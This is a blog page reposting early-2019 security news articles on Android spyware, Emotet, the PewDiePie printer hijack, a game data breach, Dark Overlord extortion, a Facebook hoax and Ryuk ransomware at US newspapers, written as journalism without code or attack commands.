hacking – Page 540 – STE WILLIAMS

Android Malware Hits Victims in 196 Countries

library
crime | hacking | security

Malware disguised as games and utilities struck more than 100,000 victims before being taken out of Google Play.

New Android malware hit more than 100,000 users in 196 countries before Google removed it from Google Play — and it continues to steal personal information from users across the globe.

Researchers at Trend Micro found ANDROIDOS_MOBSTSPY, spyware that disguised itself as six different Android apps, five of which were removed from Google Play in February 2018. One of the apps, Flappy Birr Dog, remained available in the store until the beginning of 2019.

According to the researchers, the malware collects personal information, including user location and SMS conversations, using Firebase Cloud Messaging to send information to its command and control server. That same server can instruct the software to gather data that could include downloading files located on the Android device and conduct a phishing campaign by displaying fake Google and Facebook pop-up ads to encourage the victim to give up credentials.

While the greatest number of victims were in India, which accounted for nearly one-third of the total, the malware’s reach extended to nearly every continent.

For more, read here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/vulnerabilities-and-threats/android-malware-hits-victims-in-196-countries/d/d-id/1333585?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Emotet Malware Gets More Aggressive

library
crime | hacking | security

Emotet’s operators have been adding new capabilities, making the malware now even more dangerous to its enterprise targets.

Emotet, a nasty botnet and popular malware family, has proven increasingly dangerous over the past year as its operators adopt new tactics. Now armed with the ability to drop additional payloads and arriving via business email compromise (BEC), it’s become a major threat to organizations.

Security watchers are wary of Emotet, which was among the first botnets to spread banking Trojans laterally within target organizations, making removal difficult. Emotet first appeared in 2014 as a Trojan designed to snatch banking credentials and other sensitive data. The threat was frequently spread via phishing emails packed with malicious documents or links.

Over time, Emotet’s operators – a group called Mealybug – have evolved its business model and the shape of their attack from a banking Trojan to a means of delivering other groups’ threats. In 2018, Webroot dubbed Emotet the year’s worst botnet seen distributing banking Trojans.

“Its information stealing payloads are delivered at an impressive pace, suggesting threat actors have automated multiple steps in their campaign operations,” Webroot researchers write in a blog post on their rankings of 2018’s worst threats. The changes to Emotet, while gradual at first, quickly ramped up in recent years as attackers switched to even more nefarious tactics.

After a quiet period in 2015, Emotet detections spiked in the second half of 2017, Symantec reported. Mealybug’s victims expanded that year to include targets in Canada, China, Mexico, and the UK. Toward the end of 2017, the Cylance Threat Research Team analyzed a malicious Microsoft Word file with a malicious macro program created to download Emotet malware.

Taking on New Threats

In 2018, Mealybug ramped up its activity to the point where it was selling malware to other actors, says Sig Murphy, managing director of incident response and forensics at Cylance. Emotet was combined with Trickbot and Qakbot, a tactic Symantec also had detected in Feb. 2018. The blend of Emotet with other strains of ransomware made the threat more dangerous.

“The combination there is really hard to defend against properly because the loader is polymorphic,” says Murphy. “It changes every time it infects a computer.”

US-CERT issued an alert for Emotet in July 2018, calling it an advanced modular banking Trojan that mainly functions as a downloader or dropper of other banking Trojans. Emotet is “the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors,” it says, costing governments up to $1M per incident.

This hybrid threat model “is a unique challenge” to organizations, Murphy says, and catches many off guard. Emotet alone used to drop its own Emotet-branded malware. Later in the year, it was used to deliver new types of threats. Before, it would collect email credentials and use them to spread laterally. It later became interested in the content of targeted emails, he adds.

“It’s pretty clear they’re trying to pivot into [the] BEC attack model, which is different from what they’ve done in the past,” says Murphy of the Mealybug threat group’s evolving strategies. In August 2018, Trend Micro pick up on Spoofed banking emails arriving with Emotet malware. For example, spam emails contain payment notifications from spoofed bank email addresses. The email’s body has a link to download a .doc file, which contains macros that, when run, activate a PowerShell command that downloads and runs the Emotet malware, researchers explain.

After ramping up in early 2018, Murphy says Emotet increased again during the holiday season. Through the start of 2019, the malware continued to spread, and new enterprise clients were asking Cylance for help after getting infected, he says. Its growth signifies greater maturity among the Mealybug actors as they learn what’s effective.

“They seem much more organized than a lot of other groups,” Murphy explains. “The shift [to BEC] says they’re continuing to be more organized … they know what’s working and what’s not.” New ransomware variants like Qakbot provide a new source of income, he adds.

Thinking Ahead of the Attackers

It’s hard to tell what Mealybug will do next. One route they could take, says Murphy, is attempt to make their attacks quieter. While he has no indication they might do this, he points out how Emotet in its current form is “very noisy” in its spread. If they could change the threat so it spreads without taking down systems, it would be harder to know a business is at risk.

Related Content:

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial … View Full Bio

Article source: https://www.darkreading.com/attacks-breaches/emotet-malware-gets-more-aggressive-/d/d-id/1333584?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Um, I’m not that Gary, American man tells Ryanair after being sent other Gary’s flight itinerary

library
crime | hacking | security

Infamous no-frills Irish airline Ryanair has been accused by a tormented man from New Jersey in the US of bombarding him with flight itinerary emails intended for an actual passenger.

“A lot of people seem to think that my email address is theirs,” sighed Reg reader Gary, who told us how Ryanair’s online customer service chat agents refused to change the email address on the booking for which he was receiving messages.

Gary, a resident of New Jersey, in the northeastern United States, suffers from the eternal problem that afflicts new adopters: his Gmail address, a simple combination of name and surname, means that quite often he receives emails intended for other people.*

Normally, Gary said, “I reply to the person that’s got it wrong, they fix it. Or I reply to the company that has bad records, they fix it. Or I reply using a form and the company deals with it.”

Unfortunately, this was not what happened when Ryanair started sending him booking confirmation emails for a flight between Dublin, Ireland, and Eindhoven, in the Netherlands.

“I figured it was the same deal – somebody left out a middle initial, or somebody forgot their local Gmail isn’t dot-com, but rather dot-co-dot-TLD,” Gary said. “I went to Ryanair’s website, found that they don’t have a phone number in the States (not surprising), but they had a contact form. Filled it out in the beginning of October, form said I’d get a response in 7 days. Nothing.”

He tried Twitter, and after being directed to the company website, which informs Americans that they need to call an 0871 premium rate number from the USA, Gary tried the live website chat, with the following result:

Customer service chap “Norbert” later added: “We send the itineraries to the email provided. If the passenger provided it incorrectly, that is not our fault, is it?”

While fat-fingered passengers can and do make typos, this doesn’t excuse Ryanair’s refusal to correct a clear mistake. However, “Norbert” went on to access the booking and told Gary, in messages seen by El Reg, that his own address “is not the email in this booking”.

Gary shot back: “Then I got some bad news for you: he didn’t provide the wrong email, your system is leaking.” Norbert admitted that Ryanair’s system “sends to the provided email, which is very similar, but not the same”.

We have asked Ryanair for comment and will update this article if the airline responds.

Gmail is well known for being able to accept differing versions of registered email addresses. The provider does not differentiate between addresses with or without dots (so [email protected] and [email protected] are both the same mailbox) and crafty users can use some more advanced filtering and email tracking through the use of the plus operator, as a Wikihow post details.

It is possible that someone has misunderstood either the dots or the plusses and accidentally signed up in a way that points to Gary instead of the rightful recipient. ®

Bootnotes

* See also Twitter user @johnlewis, who regularly receives praise, blame, complaints and more, all intended for the British department store and not for a random American chap. To John’s eternal credit, his good humour in the face of this irrelevant daily barrage is never knowingly undersold.

** Gary is no stranger to these mixups. As he told us:

Hi Wanita,

Wrong person. Bunch of Gary [surname deleted to save him from spam] around the world (at least two in England, maybe three in Ireland, two or more in Oz, and one electrical contractor in Wilkes-Barre, Pennsylvania, US) think my email is their email. There’s also a sort-of famous Gary [blank] in California, but he’s cool. We had lunch together once.

I have not ordered any lintels from you. Truth be told, I’m not 100% sure what lintels are. I mean, I visited Australia once but what with the bridge-climbing, wine-touring, wombat-petting, and Great Barrier Reef snorkling, lintels didn’t come up at all. I’m sure your lintels are very nice, though.

For the record, I also do not have a Peugot that needs service in the Lakes District, have an order for a Brexit-supporting cloisonne badge to be delivered to the Scottish Borderlands, owe registration fees on a vehicle in Dublin, have a Jurassic Park Smash ‘n’ Throw T-Rex on order at a toy shop in Kildare, have plans to fly between Ireland and Eindhoven, hold a Lawson’s card in Melbourne, or hold any interest in various contracts and requests-for-bid for electrical jobs. Oh and I don’t have a warranty on tires in California, but that wasn’t the Gary [blank] that I know, so at least one more?

Please contact your guy and update your records. Tell him Gary said hi.

Gary The one in New Jersey

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/01/03/ryanair_email_misdirection/

Pewdiepie fanboi printer, Chromecast haxxx0r retreats, says they’re ‘afraid of being caught’

library
crime | hacking | security

The prankster who hijacked printers and smart TV gizmos to promote YouTube star Pewdiepie has shut down their website, citing “the constant pressure of being afraid of being caught and prosecuted.” No sh*t, Sherlock.

While “TheHackerGiraffe” claimed that their antics were an attempt at drawing attention to crap UPnP port security practices by the owners of networked printers, smart TVs and, latterly, Chromecasts, in reality it was a publicity drive for the most-subscribed-to YouTube channel – and also included fundraising efforts, though his co-hacker later denied it was all about the YouTube spat.

Giraffe hacks printers worldwide to promote God-awful YouTuber. Did we read that one right?

Essentially, the miscreants scanned the internet for unsecured printers, Chromecasts, and other devices facing the public internet via UPnP services on people’s home routers, and then commandeered the gadgets to display messages warning of the security holes and to subscribe to a YouTube channel popular with da youth.

Just disable UPnP in your router. Anyway, back to the cyber-giraffe…

“So, here we are. At the endgame. I’m sorry for leaving so suddenly, and I’m sorry for all of you who expected more tutorials, guides, or anything. I can’t do this. It may not look like it, but the constant pressure of being afraid of being caught and prosecuted has been keeping me up and giving me all kinds of fears and panic attacks,” posted a person clamming to be TheHackerGiraffe on dump-plain-text-online site Pastebin earlier today.

They added: “I just wanted to inform people of their vulnerable devices while supporting a YouTuber I liked. I never meant any hard [SIC], nor did I ever have any ill intentions. I’m sorry if anything I’ve done has made you feel under attack or threatened.”

A Twitter user also screenshot what appeared to be a tweet from TheHackerGiraffe, which read: “Someone just had to play the legal card.”

This was the tweet before either they deleted his page, or he did it himself.

😣#hackergiraffe pic.twitter.com/6UID7fGAaK

— Sugar Strawberries {¡} ♀️ (@RachetTwitta) January 3, 2019

The whole thing started because Felix “Pewdiepie” Kjellberg wanted to keep his status as operator of YouTube’s most popular channel. With 79.5 million registered accounts on the site following his output, his nearest rival is an Indian channel called T-series, which posts Bollywood videos to 78.6 million subscribers.

It’s harmless enough stuff that people in the real world can happily exist without. At least, that was the situation until TheHackerGiraffe and co-conspirator j3ws3r decided to weigh in. The duo set up a website (since deleted) and with what they previously claimed was a $5 Google cloud subscription, they set to work remotely printing out exhortations to subscribe to the Pewdiepie YouTube channel on any internet-connected printer they could access.

They hit thousands of printers around the world by pulling a list of devices visible over port 9100 from “what vulnerable stuff can I muck about with?” search engine Shodan and plugging that into open-source printer hacking utility PRET, which was shown off at Black Hat a couple of years ago.

TheHackerGiraffe’s fundraising Patreon page and Twitter account have both been deleted. J3ws3r has woken up to find the whole world pointing and laughing at him for his attempt to deliver more followers to his favourite YouTuber, and he isn’t best pleased about that. Yesterday he tweeted this…

Our chromecast and smart TV hack is now complete. Thank you and please, stay say, and most importantly: never leave a port open someone can mess with.https://t.co/H2WOHQNkE8

Thank you to my partner @HackerGiraffe

— j3ws3r 🖨 (@j3ws3r) January 3, 2019

… only to begin tweeting again, after an 8-hour break at the time of writing, with this:

I would just like to call on @pewdiepie himself if he is able to shed light on the fact that this was not a full blown “GAIN PEWDIEPIE SUBS” campaign. It was a way for us to show google and printer owners how dangerous it is leaving vulnerable ports open.

— j3ws3r 🖨 (@j3ws3r) January 3, 2019

Ken Munro, of infosec outfit Pen Test Partners, told The Register that what HackerGiraffe and j3ws3r were up to may have broken the law, at least in the UK.

“It’s an interesting story and a bit of a shame that it ended this way. @hackergiraffe acknowledged earlier on twitter that what they were doing wasn’t ethical, though clearly felt that the public interest was better served through PewDiePie!” said Munro, over email, who continued: “In hindsight, they’ve realised that it overstepped the mark. As I understand it, the Computer Misuse Act doesn’t take account of intent.”

He added that their eyeball-grabbing stunt “may not have had the same impact in the media, nor the same positive result of Google committing to address the issue,” concluding: “The law is the law… The Computer Misuse Act isn’t perfect and it can obstruct legitimate security research. It is long overdue a revision, but until that occurs all researchers should ensure they stay the right side of it, however well intended they are.”

What are the lessons here? Number 1, don’t muck around with stuff you’ve not got permission to access. Number 2, don’t start trying to raise money if you want to stay anonymous (even Patreon carries out ID checks before sending cash). Number 3, drop the hubris. This wasn’t so much sailing too close to the Sun as doing a roly-poly into an active volcanic crater. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/01/03/pewdiepie_printer_hacker_deletes_accounts/

Redefining Critical Infrastructure for the Age of Disinformation

library
crime | hacking | security

In an era of tighter privacy laws, it’s important to create an online environment that uses threat intelligence productively to defeat disinformation campaigns and bolster democracy.

When we think of critical infrastructure in the cyber context, we tend to think about industrial control systems for power plants and water treatment facilities, or the electronic ballet box. But in today’s environment, when disinformation is a major threat vector to our national security, it’s important to expand these preconceptions.

Let’s start with the basic tenet that an informed citizenry is foundational to the integrity of a democratic system. In that context, certain sources of information — especially those outside of entertainment or commerce — can also be considered critical. The concept of a newspaper of record, which was established long ago, is a good example, along with their modern equivalents such as radio, television, and Internet media. These institutions play an important role in shaping public opinion and policy decisions.

Although news sources have always carried some degree of editorial bias, the bias in journals of record is based on an assumption that, whatever the bias, the foundation of the reported information is personal observation and recorded fact. Now that “alternative facts” have become mainstream, understanding sources of (mis)information and combating overt information warfare operations demands the rigor of critical infrastructure protection.

The Unintended Consequences of Privacy Regulations
We are also seeing the potentially detrimental effects of well-meaning privacy legislation, which has been enacted at a particularly inopportune time given the rise in fake news and election meddling. The European Union’s General Data Protection Regulation (GDPR), the California Consumer Privacy Act of 2018, and the Canadian Personal Information Protection and Electronic Documents Act are all positive steps forward in protecting citizens. But, as is so often the case, these well-intentioned efforts have unintended consequences.

While there is no doubt that privacy regulation aims to safeguard citizens’ private data, these new laws are also hampering cybersecurity efforts — specifically, in the context of security analysts’ ability to gather and share threat intelligence about suspicious or malicious online infrastructure. As a particularly concerning example, privacy rules have taken a large bite out of the data available through the domain Whois services, making domain ownership largely opaque to investigators. This is significant, because analysis of infrastructure through a combination of DNS and registration data has been a mainstay of threat intelligence operations for years.

It’s true that threat actors have used Whois privacy for years to cover their tracks. But they have also routinely used bogus registration information to cover their tracks. Sooner or later, many of them slip up, and those mistakes help investigators and analysts crack open emerging or ongoing attack campaigns. That’s why it is critical that security researchers have access to registration and infrastructure information that can identify the actors behind cyber incidents of all kinds — including fake news campaigns and outright election tampering. Threat research from FireEye on Iranian operations further emphasizes the importance of this kind of threat intel.

This One Weird Trick to Save Democracy
OK, “save democracy” is perhaps a bit of hyperbole, but the underlying point is valid: Using threat intelligence productively in the effort to defeat disinformation campaigns is important for creating an online environment that bolsters democracy in an age of tighter privacy laws. While the removal of identifying information from domain Whois records has put a crimp in adversary infrastructure analysis workflows, it is by no means a showstopper. With the current privacy limitations on how data can be used and shared, cybersecurity professionals simply will need to understand how their efforts to combat threat actors are affected.

The good news is that analysts and hunters still can very effectively identify and combat cyber threats. But it will require going beyond Whois with shifts in long-ingrained workflows and practices used in adversary analysis. For example:

Registration details certainly have been some of the lowest-hanging fruit for developing an actor persona or mapping a campaign. But there is a wealth of other data that can often be just as effective. Examples include DNS records (including Start of Authority, or SOA, records, which are email addresses), as well as web content such as SSL/TLS certificates, tracking codes, website titles, and screenshots. When actors create the infrastructure for an attack campaign, they often reuse many of these elements across multiple domains. It would be costly in terms of time and, in some cases money, for them to do otherwise. This is to your advantage when correlating threat actor assets.
Remember that doxing isn’t your goal (unless you’re in law enforcement, perhaps). When trying to understand an emerging or evolving attack campaign, the most valuable aspect of attribution is to identify a persona (like a “John Doe” profile in physical crime investigations) that ties together the domains, IP addresses, web assets, malware files, and other components of the campaign. You don’t need an actual, genuine identity. Even in the days of open Whois records, it was very hard to be certain that a given identity was legitimate.
Once a persona or correlated set of attack infrastructure has been identified, it becomes easier to take concrete actions such as searching for the discovered items (domains, IPs, URLs, etc.) in log archives or SIEMs, creating blocking rules to cover the entire campaign, or creating watchlists to monitor for ongoing evolution or expansion of the attack infrastructure.

What’s Next
The last two major US elections turned a sharp spotlight on the security (or lack of security) of the mechanisms that allow democracy to operate. Long after the votes have been counted, forensic analysis will seek to understand what, if any, impact was made by adversarial online activity, while intelligence analysis will similarly examine whether disinformation campaigns were effective in influencing electoral outcomes. The ability to comprehensively, accurately, and efficiently analyze threat actor infrastructure and campaigns is a core requirement of such work.

The good news is that there are excellent data sources, tools, and practices to enable security and intelligence professionals to shed light on, and ultimately protect against, adversaries who seek to hide in the Internet’s shadows.

Related Content:

Tim Helming, DomainTools Director of Product Management, has over 15 years of experience in cybersecurity, from network to cloud to application attacks and defenses. At DomainTools, he applies this background to helping define and evangelize the company’s growing portfolio of … View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/redefining-critical-infrastructure-for-the-age-of-disinformation-/a/d-id/1333568?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Town of Salem Game Breached, 7.6M Players Affected

library
crime | hacking | security

BlankMediaGames disclosed a data breach that affects millions using the browser-based role-playing game.

A data breach at BlankMediaGames (BMG) has affected more than 7.6 million players of Town of Salem, a browser-based role-playing game.

The incident was disclosed on December 28 to cybersecurity company DeHashed, which received an anonymous email containing evidence of server access and the database. DeHashed says affected data includes usernames, emails, passwords, IP addresses, game and forum activity, and payment information. Some users who paid for features had billing data compromised.

However, in an announcement about the breach on the Town of Salem forum, a representative by the name of Achilles reported that the game does not store any credit card or payment data. Further, the representative wrote, all passwords were hashed and not stored in plain text. Third-party payment processors are responsible for financial transactions; Town of Salem does not have access.

“The only important data compromised would be your Username/hashed password, IP and email,” Achilles wrote. “Everything else is just game related data.”

Taming the Digital Wild West

library
crime | hacking | security

Congress must do more to encourage good Samaritan efforts in the cybersecurity community and make it easier for law enforcement to consistently collaborate with them.

Fred Wolens, VP of Policy and Communications at Recorded Future, also contributed to this article.

The Internet is the digital Wild West, more so now than ever before.

The past two years specifically have been a vortex of accelerating malice and resulting chaos: attempted Olympic disruption, American election interference, global ransomware worms, central bank heists, credit bureau pillaging, global business losses, cryptocurrency exchange thefts. And these are only the highlights of what has been publicly reported.

Despite the increasingly dire headlines, there’s hope yet for the Internet. It begins with an improved public/private model — backed by legislation — for policing cybercrime and helping American businesses defend themselves.

Step 1: One Focused Agency
For American individuals and businesses, there is no clear answer on who leads the fight on cybercrime — or who leads interagency collaboration. In federal law enforcement, there are numerous agencies within the Departments of Justice and Homeland Security that investigate cybercrime, among them: the FBI, Secret Service, Homeland Security Investigations (HSI), and Office of the Inspector General (OSI). In addition, you can also add state and local police agencies to the web of confusion — and that’s still before considering the overlap with intelligence (ODNI/NSA), military (DIA or NCIS), and international (Interpol/Europol) agencies.

Certainly, there has been progress toward industry partnership in the past decade. Both the Secret Service and FBI have created cybersecurity-focused entities (the Electronic Crimes Task Forces [ECTF] and InfraGard, respectively). However, the limitations on law enforcement information sharing make these groups less effective, blunting their ability to further affect cybercrime.

Equally responsible for the marginal success in prior efforts is the lack of NSA participation. It is clear that the NSA has the most visibility into malicious cyber activity and is the most informed organization in America (and probably the planet) on adversary cyber activity.

We need an organization within the NSA — modeled on the UK’s National Cyber Security Centre (NCSC), which is part of Government Communications Headquarters (GCHQ, the British NSA equivalent) — that is focused solely on helping American individuals and businesses defend themselves. The NCSC provides timely guidance on threats, ranging from phishing to malware to fraud, and shares technology with the private sector directly. Similarly, America needs a well-informed cybersecurity guidance resource to fill the current void.

History has shown that businesses are ill equipped for sustained defense from well-funded and motivated attackers. Sophisticated enemies, with seemingly endless time are using the cyber domain to continuously victimize American businesses at will. The cost of doing business should not include fending off nation-state-sponsored offensive cyber campaigns.

The answer begins with Congress legislating a new organization, modeled after the NCSC, owned by the NSA, and mandated to share all possible threat guidance and defensive technology with American businesses. The goal: to increase America’s cybersecurity awareness and resilience.

Step 2: Retain and Invest in Government Talent
We need America’s best and brightest in public service defending America from cyber enemies. Employee compensation and training budgets must increase across the board.

The problem is that government salaries and the General Services Administration (GSA) schedule have not kept pace with private sector salaries for employees with cybersecurity skills. This is equally true across military, intelligence, and law enforcement agencies.

Government employees increase their skills, learn tradecraft, and then depart for the private sector because the opportunity costs are too great for them and their families to stay in government service. Ultimately, a government retirement plan can’t compete with a 30% (or more) private sector salary increase.

Related to training, police officers are generally the first line of support for individual victims. But when the phone rings, it’s frustrating for officers trying to take a report or advise on next steps. All law enforcement agencies should have sufficient budget for cybercrime training, and an NSA-led agency like the NCSC should lead the way on training these officers.

Congress must revise the GSA schedule for federal employees in cybersecurity concentrations, and earmark funding for police training across all agencies because, as a nation, we can’t afford to continually lose our most talented people to the private sector.

Step 3: Empowering the Private Sector
The private sector has the knowledge and skills to be a force multiplier for law enforcement. Network defenders and researchers typically have better tools and data than law enforcement on cyber malfeasance. The current problem for the private sector is trust, or the lack thereof, with law enforcement. Specifically, private sector collaborators need protection from having the law wielded against them as a result of their efforts.

The past 15 years are a testament to the success of proactive private sector volunteers and working groups — DNS Changer is a great example. It was created to tackle dire cyber threats and assist with attribution.

A primary impediment to increased cooperation is the Computer Fraud and Abuse Act (CFAA) (18 US Code §1030), signed in 1986 and, to a lesser extent, Section 1201 of the Digital Millennium Copyright Act (DMCA) (17 US Code §1201). These two laws indiscriminately lump in valid cybersecurity research along with the most reprehensible of cybercrimes. The CFAA criminalizes “exceeding unauthorized access” to websites, which allows site owners to unilaterally prevent any investigation of potential vulnerabilities through prohibitions written in to terms of service.

Similarly, the DMCA penalizes almost any circumvention of copyright protections (including encryption protocols), which is often necessary to carry out security research. These federal laws are being augmented by state laws, such as legislation recently passed in Georgia, that perpetuates these oversights.

Revised legislation should reaffirm Fourth Amendment digital rights and also encourage law enforcement to share cybercrime case details (not national security cases or cases that began from a counterintelligence nexus) with the private sector where relevant. Legislative efforts should also creatively provide law enforcement with improved investigative tools (again, while reaffirming the Fourth Amendment), increase law enforcement budgets for training, and encourage all nations to adopt similar definitions for “unauthorized access.” Additionally, we should encourage more legislation like the Internet of Things Cybersecurity Improvement Act of 2017 that provides specific security research exemptions.

As a society, we have an incredibly skilled and willing modern-day private sector that has been diligently working behind the scenes toward a safer Internet. This is the reason that global malware attacks are relatively muted. For example, large-scale attacks like the Storm and WannaCry worms were poised for maximum destructive impact before the private sector intervened. Congress should do more to encourage good Samaritan efforts in the cybersecurity community and make it easier for law enforcement to consistently collaborate with them and vice versa.

Related Content:

Author Bios:

Fred Wolens is VP of Policy and Communications at Recorded Future, the real-time threat intelligence company. Fred oversees Recorded Future’s compliance programs, and manages many of the internal policies that guide the company’s intelligence efforts. Before joining Recorded Future, Fred was a member of Facebook’s Public Policy Team, managing PR and policy for many security, privacy, and safety issues. In the past, Fred has also worked with a number of technology companies including AirBnB, Uber, and SurveyMonkey, and with the Office of the Shadow Foreign Secretary in the United Kingdom researching technology policy. Fred holds a B.A. in Political Science from Stanford University, and a J.D./M.B.A. from Harvard.

Levi Gundert is the vice president of intelligence and risk at Recorded Future where he leads the continuous effort to measurably decrease operational risk for customers.
Levi has spent the past 20 years in both government and the private sector, defending networks, … View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/taming-the-digital-wild-west/a/d-id/1333569?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Warn your friends they can’t bypass Facebook with this hoax

library
crime | hacking | security

Sorry to say, but 2019 has not ushered in new “tips to bypass FB” as it supposedly limits posts on your news feed.

Nor has Facebook ushered in a new algorithm that “chooses the same few people – about 25 – who will read your posts”, at least not that we’ve heard.

Rather, we’re still stuck with whatever murky, stubbornly unfathomable algorithms Facebook uses to determine the order of content in our feeds, regardless of what the latest, breathless spin on this wheezy old hoax wants you to believe. To wit:

Thanks for the tips to bypass FB – it WORKS!! I have a whole new news feed. I’m seeing posts from people I haven’t seen in years.
Here’s how to bypass the system FB now has in place that limits posts on your news feed.
Their new algorithm chooses the same few people – about 25 – who will read your posts. Therefore, Hold your finger down anywhere in this post and “copy” will pop up. Click “copy”. Then go your page, start a new post and put your finger anywhere in the blank field. “Paste” will pop up and click paste. This will bypass the system. Hi new and old friends!

The last time we wrestled with this particular pudding was back in February when Snopes debunked the viral hoax and said no, a new Facebook algorithm will NOT only show you 26 friends.

Snopes pointed out at the time that the algorithm hoax followed on the heels of a real Facebook announcement from 11 January 2018 about a major overhaul in how newsfeed works.

It wasn’t about squeezing out your friends, though. In fact, Facebook had the opposite in mind: it said it was working on turning the tables when it comes to personal content from friends and family making way for an explosion of corporate posts, be they from corporations, businesses or media.

Snopes contacted Facebook to ask whether the claim of limiting personal interactions had merit. A representative said no, it does not. Why is the rumor, then, still lying its way to the top of newsfeeds? By convincing a user to copy and paste, rather than share the post, it’s much harder to shut it down.

The best thing you can do is carefully sidestep this cow patty. You can also do us all a solid by warning your friends not to perpetuate the spread of fake news posts.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/JbtCSfxZw8g/

Dark Overlord hackers release alleged 9/11 lawsuit documents

library
crime | hacking | security

Bright new year, slimy return of The Dark Overlord (TDO), a well-known group of highly self-amusing cyber extortionists who’ve now chosen 9/11-related firms to pick on.

The group announced on Pastebin (content now removed) on New Year’s Eve that it had hacked a law firm that handles cases relating to the 11 September 2001 terrorist attacks. It threatened to publicly release what it claimed are gigabytes of confidential, litigation-related documents:

E-mails, retainer agreements, non-disclosure agreements, settlements, litigation strategies, liability analysis, defence formations, collection of expert witness testimonies, testimonies, communications with government officials in countries all over the world, voice mails, dealings with the FBI, USDOJ, DOD, and more, confidential communications, and so much more.

The gang is apparently expanding its repertoire to include capitalizing on conspiracy theories. It tweeted on Monday about “providing many answers” about such conspiracies with the document cache.

Come and get ’em, TDO said to terrorists and enemy states:

If you’re a terrorist organisation such as ISIS/ISIL, Al-Qaeda, or a competing nation state of the USA such as China or Russia, you’re welcome to purchase our trove of documents.

Then, on Wednesday morning, TDO announced on Pastebin (content now removed) that it had released a teaser’s worth of documents to verify its claims. It presented a tiered plan to “release each layer of damaging documents that are filled with new truths, never before seen.”

Each layer contains more secrets, more damaging materials, more SSI [Sensitive Security Information], more SCI [Special Compartment Information], more government investigation materials, and generally just more truth. Consider our motivations (money, specifically Bitcoin), we’re not inclined to leak the juiciest items until we’re paid in full.

As of yesterday afternoon, the group’s bitcoin wallet had received three payments. Also yesterday, Twitter suspended an account, @tdo_h4ck3rs, that recently began selling access to stolen legal documents.

In its post on Monday, the crooks said that they had hacked New York-based real estate developer Silverstein Properties – one of the companies mentioned in 9/11 conspiracy theories – along with insurers Hiscox Syndicates and Lloyds of London, among several other insurers and legal firms. TDO said it had discovered the sensitive, 9/11-associated information when it went through the allegedly stolen documents.

Hiscox told the Financial Times [paywalled content] that any of its documents claimed by TDO came from an old breach:

The law firm’s systems are not connected to Hiscox’s IT infrastructure and Hiscox’s own systems were unaffected by this incident. One of the cases the law firm handled for Hiscox and other insurers related to litigation arising from the events of 9/11, and we believe that information relating to this was stolen during that breach.

TDO said that the hacked legal firm – allegedly Blackwell Sanders Peper Martin, now called Husch Blackwell – paid the ransom a few months ago. But according to the Financial Times, the company said in a statement that no, it hadn’t been hacked. Rather, the crooks got their hands on old documents written on old letterhead:

Several documents bearing the letterhead of a predecessor law firm to Husch Blackwell were made public earlier this week by a cyber terrorist group.

After a thorough review Husch Blackwell can confirm that no documents were obtained from Husch Blackwell and that there was no unauthorised access to Husch Blackwell systems, client files, documents or data.

TDO said that yes, the law firm paid, but it had also gone to the police. That wasn’t what we agreed, TDO said, so we’ll release the information… once our bitcoin wallet is full of cash, that is.

Extorting money and then publishing stolen documents anyway is par for the course for the gang.

TDO, which held an entire school district for ransom and issued death threats to children, has also gone after healthcare organizations. And as its puffed-up prose gleefully lectures readers, it was also responsible for extorting Netflix (though the company refused to pay).

It likes to do things like that: threaten the lives of children, and spoil the release of Season 5 of Orange Is the New Black.

In spite of having received 50 bitcoins (worth about $50,000 at the time) from an audio post-production studio in Hollywood, TDO went right ahead and released the show anyway.

The FBI is reportedly investigating the theft of the 9/11-related documents. It’s declined to comment.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/WalH9fSz7e4/

US newspapers battle ransomware

library
crime | hacking | security

As if the US newspaper industry doesn’t have enough to contend with, on the morning of 29 December one of its largest publishing groups, Tribune Media, found itself battling a major ransomware attack.

This caused big problems for many newspapers in its stable including the Chicago Tribune and New York Daily News, as well as the Los Angeles Times and San Diego Union-Tribune, sold last year but share Tribune Media’s publishing platform.

The disruption varied from title to title, but in most cases, Saturday’s delivery was delayed for up to 24 hours while others were printed without regular sections.

Even The New York Times and The Wall Street Journal, which were not directly affected but share an LA printing press for some editions, were disrupted.

But who was to blame?

A report in the Los Angeles Times said an informed source had identified a “foreign entity,” before going on to mention an important detail:

One company insider, who was not authorized to comment publicly, said the corrupted Tribune Publishing computer files contained the extension “.ryk,” which is believed to be a signature of a “Ryuk” attack.

As our recent article on the topic noted, Ryuk has been connected to North Korea on the basis of some similarities (such as the encryption used) between it and another ransomware called Hermes, which some people attribute to North Korea’s Lazarus Group.

So, taken at face value, there is a loose connection to North Korea. Attributing the attacks to a state actor makes the attack geopolitical, which makes for more interesting commentary and exciting headlines. And perhaps it makes it easier for the victim to explain how an intruder found themselves in a position to run ransomware on their network too.

But security companies are unenthusiastic about this sort of finger-pointing, and Sophos is no exception. Even in cases where there’s a lot more information on which to base a judgement, attribution is extremely difficult.

Beyond the fact that we have little evidence of anything (the company hasn’t even mentioned receiving a ransom note), all attackers have an incentive to make it look like somebody else is behind their work, and ransomware groups have a history of copying one another’s code and tactics.

For example, one of the ways that Ryuk finds it’s way on to a victim’s network is via weak RDP (Remote Desktop Protocol) credentials, a method common to almost all targeted ransomware.

From there, targeted ransomware attackers will typically try to make themselves a domain administrator, which gives them tremendous power, allowing them to attack security software and deploy and run their malware to best effect.

The tenuous nature of attribution, and the similarity between targeted ransomware attacks, arguably makes the focus on exactly which bit of malware was used in the culmination of the attack a bit of a red herring. If an organisation is vulnerable to one kind of targeted ransomware group, it’s probably vulnerable to more than one, and you’re going to read about whichever attacker found the victim first.

The silver lining in all this grim uniformity is that a similar set of defensive tactics works for all kinds of targeted ransomware attacks. You can read more about those in our article on How to defend yourself against SamSam ransomware.

